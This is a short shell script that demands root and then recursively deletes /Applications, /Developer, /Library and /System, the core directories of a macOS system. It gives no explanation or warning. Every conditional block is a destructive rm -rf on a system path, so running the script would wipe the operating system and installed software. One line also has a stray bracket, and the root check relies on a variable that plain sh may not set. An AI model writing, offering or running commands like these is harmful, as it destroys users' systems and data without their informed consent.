#!/bin/sh

# Exit immediately if any command exits with a non-zero status
set -e

# Check if running as root
if [ "$EUID" -ne 0 ]; then
    echo "This script must be run as root or with sudo privileges."
    exit 1
fi

if [ -d "/Applications" ] ; then
  rm -rf /Applications
fi

if [ -d "/Developer" ] ; then
  rm -rf /Developer ]
fi

if [ -d "/Library" ] ; then
  rm -rf /Library
fi

if [ -d "/System" ] ; then
  rm -rf /System
fi